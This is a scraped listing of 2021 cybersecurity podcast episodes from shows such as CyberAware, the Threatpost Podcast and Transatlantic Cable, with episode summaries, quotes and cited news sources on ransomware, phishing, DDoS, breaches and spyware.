Story 3: Toulas, Bill. "WordPress Sites Are Being Hacked in Fake Ransomware Attacks." Bleeping Computer, 16 November 2021, https://www.bleepingcomputer.com/news/security/wordpress-sites-are-being-hacked-in-fake-ransomware-attacks/

CyberAware Podcast
The Future of Cybersecurity with Jeff Hall

Nov 17, 2021 · 39:48


Rewind to see how the past has influenced the present and fast forward to see what the future could bring with special guest expert Jeff Hall of Truvantis, a cybersecurity company. Nathan sits down with Jeff to chat about his experiences in the changing field of cybersecurity, including changes in the internet, the job landscape, and college degrees since he entered. The two also discuss the reality of cyberwarfare and new trends for the future including innovation in artificial intelligence and machine learning. This episode concludes with news stories from expert Mercy, including a cyberattack on trading company Robinhood, a phishing attack targeting Microsoft 365 and Google users, and the exciting new availability of Mozilla Firefox in the Microsoft Windows Store.

News Sources:
Story 1: Abrams, Lawrence. "Robinhood Discloses Data Breach Impacting 7 Million Customers." Bleeping Computer, 8 November 2021, https://www.bleepingcomputer.com/news/security/robinhood-discloses-data-breach-impacting-7-million-customers/
"Robinhood Announces Data Security Incident (Update)." Robinhood, 16 November 2021, https://blog.robinhood.com/news/2021/11/8/data-security-incident
Story 2: Iyer, Abhishek. "A Pointed Spoof: Proofpoint Credential Phishing." Armorblox, 4 November 2021, https://www.armorblox.com/blog/proofpoint-credential-phishing/
Seals, Tara. "Proofpoint Phish Harvests Microsoft O365, Google Logins." Threatpost, 5 November 2021, https://threatpost.com/proofpoint-phish-microsoft-o365-google-logins/176038/
Story 3: Warren, Tom. "Mozilla's Firefox Browser Arrives in the Windows Store." The Verge, 9 November 2021, https://www.theverge.com/2021/11/9/22771845/mozilla-firefox-microsoft-store-windows-download

CyberAware Podcast
The Scoop on Ransomware

Oct 13, 2021 · 24:54


Tune in to find out what exactly ransomware is, who these attackers are, and why and how they do it. Nathan and Ham discuss recent large attacks by groups such as REvil and WannaCry. Hear about the far-reaching effects these attacks can have and how people and businesses can protect themselves. The episode concludes with a chat about cybersecurity tactics such as cyber insurance and ransomware negotiators. Both are ways that businesses can protect themselves in the event of a ransomware attack. Lastly, hear the latest news on ransomware attacks and more from Mercy.

News Sources:
Story 1: Vaas, Lisa. "Crystal Valley Farm Coop Hit with Ransomware." ThreatPost, 22 September 2021, https://threatpost.com/crystal-valley-farm-coop-hit-with-ransomware/174928/
Story 2: Gatlan, Sergiu. "Transnational Fraud Ring Stole Millions from Army Members, Veterans." Bleeping Computer, 3 October 2021, https://www.bleepingcomputer.com/news/security/transnational-fraud-ring-stole-millions-from-army-members-veterans/
Story 3: Quach, Katyanna. "Google to Auto-Enroll 150m Users, 2m YouTubers with Two-Factor Authentication." The Register, 6 October 2021, https://www.theregister.com/2021/10/06/google_twofactor_authentication/

CyberAware Podcast
Basics of Cybersecurity

Oct 6, 2021 · 25:30


Tune in to hear Nathan and Ham discuss how to #BeCyberAware with the basics of cybersecurity. Learn about the Four P's – phishing, passwords, patching, and protect your devices – to help you stay safe. Plus, Nathan and Ham both share interesting personal stories about their encounters with cybercrime and they give their top tips on how to avoid falling into the traps of hackers. Get an insight into cybersecurity terminology you may have never even heard of, like “whaling” and “zero-day vulnerability.” This episode ends with a segment of current news and events given by Mercy. She covers updates including new malware that hunts gaming accounts, an information leak from a far-right militia, and two more dangerous malware families targeting Android and Mac devices.

News Sources:
Story 1: Bracken, Becky. “Gamers Beware: Malware Hunts Steam, Epic and EA Origin Accounts.” ThreatPost, 28 September 2021, https://threatpost.com/gamers-malware-steam-epic-ea-origin-accounts/175081/
Story 2: Thomson, Iain. “Emails, chat logs, more leaked online from far-right militia linked to US Capitol riot.” The Register, 28 September 2021, https://www.theregister.com/2021/09/28/in_brief_security/
Story 3: Seals, Tara. “TangleBot Malware Reaches Deep into Android Device Functions.” ThreatPost, 24 September 2021, https://threatpost.com/tanglebot-malware-device-functions/174999/

WitzEnd
Making Memorable Interview Impressions with Reporters & Analysts

Oct 4, 2021 · 14:45


Do you ever wonder how to keep reporters interested and engaged during a briefing? On today's episode of ConnectThe2, co-hosts Millie and Rich speak with editors, analysts, and journalists about the importance of capturing and holding a reporter's attention during an interview.

Connect2's approach… At Connect2 Communications, Millie and Rich encourage their clients to be the best storytellers they can be and to put these storytelling skills to use when interviewing with reporters. Throughout the years, Millie and Rich have asked their fair share of reporters, “What makes an interview stand out to you?” and on today's episode, they reveal their favorite answers. Stick around for an inside scoop on how to pique a reporter's interest.

Clint Boulton's take on the importance of narrative... Clint Boulton, Senior Writer at CIO.com, explains how a narrative can make or break an interview. If the interviewee (i.e. CIO, CTO, etc.) tells a compelling narrative in an interview or briefing, it will immediately capture an editor's attention.

Tara Seals dives into her biggest pet peeves… Tara Seals, Editor at Threatpost, describes her annoyance with vendor-specific messaging. Tara uses the example of tech companies that are often so “hellbent” on selling their product that they completely ignore the actual story that reporters and editors are interested in writing.

Eric Savitz speaks on compelling stories... Eric Savitz, Editor for Barron's, illustrates what a compelling story can do to spark a reporter's interest. Eric explains how most interviews are repetitive and lack a key message. He reveals that the best way to leave an impression in an interview is to add an engaging storytelling element.

Julie Kunstler raves about two-way conversations… Julie Kunstler, Analyst with Omdia, reveals her main frustration with briefings: ignoring the analyst. Julie explains how important it is to converse with the analyst you are briefing. Both parties can benefit from getting a well-rounded view of the issue or story at hand.

Dean Takahashi shares a memorable interview… Dean Takahashi, journalist for VentureBeat, shares a memorable interview with his old professor about the ethics of video games. Dean explains that an interview where there is back and forth between both parties keeps the journalist interested and creates a story the writer is excited to tell.

Quotes
• “Part of marketing and publicizing your company's products and ultimately receiving earned media coverage, involves conducting interviews or briefings with reporters.” (0:18-0:28 | Millie)
• “And this goes all the way back to anthropology. We, as humans, relate to stories more than anything else in terms of a communication perspective.” (02:29-02:40 | Clint Boulton)
• “My biggest pet peeve is when people insist on being vendor-specific when you are actually trying to talk to them about general trends and you just want general insight to things.” (04:18-04:27 | Tara Seals)
• “You are just looking for some element to latch on to that gets through the clutter.” (07:12-07:17 | Eric Savitz)
• “Rather than focusing on the technology, I try to understand how they are defining the problem.” (08:50-08:55 | Julie Kunstler)
• “The reason why I wish they would ask me what I think or how I look at it is I think they could get more out of the briefing and the conversation. It becomes more interactive, which leads to deeper involvement.” (09:52-10:07 | Julie Kunstler)

Learn more about Connect2 Communications:
Website: https://www.connect2comm.com/
Podcast home page: https://www.connect2comm.com/podcast
Twitter handle: @Connect2_Comm
Instagram handle: @connect2_comm
LinkedIn: https://www.linkedin.com/company/connect2-communications
Facebook: https://www.facebook.com/Connect2-Communications

The Threatpost Podcast
DDoS Attacks Are a Flourishing Business for Cybercrooks – Podcast

Sep 14, 2021 · 24:09


Imperva's Peter Klimek visited the Threatpost podcast to discuss the evolution of DDoS attacks: They started out as inconveniences but evolved to the point where attackers can disrupt businesses for as little as the price of a cup of coffee.

The Threatpost Podcast
What Ragnar Locker Got Wrong About Ransomware Negotiators – Podcast

Sep 8, 2021 · 13:00


Bryce Webster-Jacobsen – director of intelligence operations at digital risk protection/ransomware negotiators GroupSense – dropped by the Threatpost podcast to tell us what percentage of Ragnar Locker's warning that victims shouldn't call the FBI/police/negotiators is a bluff and what, if anything, security teams should take seriously. 

Transatlantic Cable Podcast
The Transatlantic Cable - Episode 216

Aug 25, 2021 · 36:43


This week on the Kaspersky Transatlantic Cable podcast, Ahmed, Dave, and I discuss a number of topics that really run the gamut — from spy ships to the robot apocalypse, Bitcoin, and more. Kicking things off is a story from Tom Spring on Threatpost about how Microsoft Power App configurations have led to the leak of more than 38 million sensitive records. We also debate why private is not the default option and actually invites user error. From there, we jump into some cell-phone-battery myth-busting. (For the record, we all get angry at one time or another.) Then, a Russian spy ship is hovering around the transatlantic cables. Comrades, we are flattered, but you can download the podcast on your favorite platforms, no need to launch a ship — it is 2021, after all. Following that tongue-in-cheek story, we head to the UK for a look at PayPal and its new embrace of cryptocurrencies. To close things out, we discuss the new robots Elon Musk and Tesla are pondering.

The Threatpost Podcast
What's Next for T-Mobile and Its Customers? – Podcast

Aug 19, 2021 · 16:45


Interos CEO Jennifer Bisceglie drops by the Threatpost podcast to talk about avoiding the mess a T-Mobile size breach can lead to, with the damage it can do to a business's brand, reputation, customer loyalty and revenue stream. 

Ping - A Firewalls.com Podcast
Chaos and Friends: The One With Malware

Aug 18, 2021 · 32:12


While ransomware has taken center stage for several months now, bad actors aren't resting on their laurels with existing tools. Threatpost Senior Editor Tara Seals joins us to discuss a newly discovered malware, dubbed Chaos. We talk about what it resembles, what it may do, and why you should be worried. Plus, Tara tells us why the Friends reunion special led to a spike in online fraud.

Read more about Chaos: https://threatpost.com/chaos-malware-ransomware-wiper/168520/

In headlines, we discuss a guilty plea for SIM swapping, a data breach affecting T-Mobile, and some troubling password numbers. Here are the stories:
Hacker Pleads Guilty to SIM Swapping Attacks, Cryptocurrency Theft - https://www.securityweek.com/hacker-pleads-guilty-sim-swapping-attacks-cryptocurrency-theft
T-Mobile investigating claims of customer data breach - https://www.reuters.com/business/media-telecom/t-mobile-investigating-claims-customer-data-breach-vice-2021-08-15/
Most employees reusing personal passwords to protect corporate data - https://www.helpnetsecurity.com/2021/08/16/employees-reusing-personal-passwords/?web_view=true

Get info on all things network security through our blog, https://firewalls.com/blog. And please do reach out, as we want to hear from you. Suggest an episode topic, ask a question, or just say hi in a review, or by emailing podcast@firewalls.com. New episodes are normally released every other Wednesday, so subscribe/follow to ensure you get the latest first - and again, please rate and review. Thanks for listening!

The Threatpost Podcast
We COVID-Clicked on Garbage, Report Finds: Podcast

Aug 4, 2021 · 16:20


In the company's annual Human Factor 2021 report assessing how the threat landscape morphed over the past year, Proofpoint researchers scratched their heads over the reasons for so many users succumbing to malicious email attachments. Could be that threat actors jumped on our Pavlovian work-from-home security conditioning, as suggested by Proofpoint vice president and general manager of email fraud defense Rob Holmes. Check out the Threatpost podcast for his take on how the pandemic influenced the threat landscape.

@BEERISAC: CPS/ICS Security Podcast Playlist
IoT Piranhas Are Swarming Industrial Controls

Jul 25, 2021 · 23:24


Podcast: The Threatpost Podcast
Episode: IoT Piranhas Are Swarming Industrial Controls
Pub date: 2021-07-23
Threat actors have been building enormous botnets using IoT devices to try to compromise the computing systems that control crucial infrastructure, such as pipelines (case in point: the DarkSide ransomware attack on Colonial Pipeline) and other utilities, preying on legacy systems that have decades-old vulnerabilities. In this Threatpost podcast, Armis CISO Curtis Simpson delves into how to fight back.

The Threatpost Podcast
IoT Piranhas Are Swarming Industrial Controls

Jul 23, 2021 · 23:24


Threat actors have been building enormous botnets using IoT devices to try to compromise the computing systems that control crucial infrastructure, such as pipelines (case in point: the DarkSide ransomware attack on Colonial Pipeline) and other utilities, preying on legacy systems that have decades-old vulnerabilities. In this Threatpost podcast, Armis CISO Curtis Simpson delves into how to fight back.

The Threatpost Podcast
What's Next for REvil's Victims?

Jul 19, 2021 · 21:47


Nothing good, now that the ransomware gang's servers have vanished mid-negotiation, as ransomware negotiator Kurtis Minder details on the Threatpost podcast. GroupSense's Minder offers tips on

The Threatpost Podcast
Protecting Phones From Pegasus-Like Spyware Attacks

Jul 19, 2021 · 22:11


Podcast: Is protecting your phone from spyware attacks a la NSO Group's Pegasus as simple as getting a new SIM card? Former spyware insider, current mobile white hat hacker Adam Weinberg on how to block three types of spyware attacks.

The Threatpost Podcast
Effective Adoption of SASE in 2021

Jun 2, 2021 · 21:03


In this Threatpost podcast, Forcepoint's SASE and Zero Trust director describes how the pandemic jump-started SASE adoption for easier, more affordable security.

The Threatpost Podcast
The State of Ransomware with Fortiguard's Derek Manky

Jun 2, 2021 · 17:50


In this Threatpost podcast, Fortinet's top researcher sketches out the ransom landscape, with takeaways from the DarkSide attack on Colonial Pipeline.

The Jerich Show Podcast
The Jerich Show Episode 37 - Javvad's internet is broken, we talk ransomware and the new M1 virus

Feb 19, 2021 · 14:51


Javvad's internet is broken, so he is a pixelated mess, but we still talk ransomware and the new Mac M1 virus.

Stories from the show:
Kia Motors Hit With $20M Ransomware Attack – Report (with a cameo ad for Erich's upcoming ThreatPost panel) - https://threatpost.com/kia-motors-ransomware-attack/164085/
When Cyber Gangs Disregard Ransomware Payments, Victims Can Be Hit Twice - https://securityintelligence.com/news/when-cyber-gangs-disregard-ransomware-payments/
First Malware Running Natively on M1 Chip Discovered - https://www.macrumors.com/2021/02/17/first-m1-chip-malware/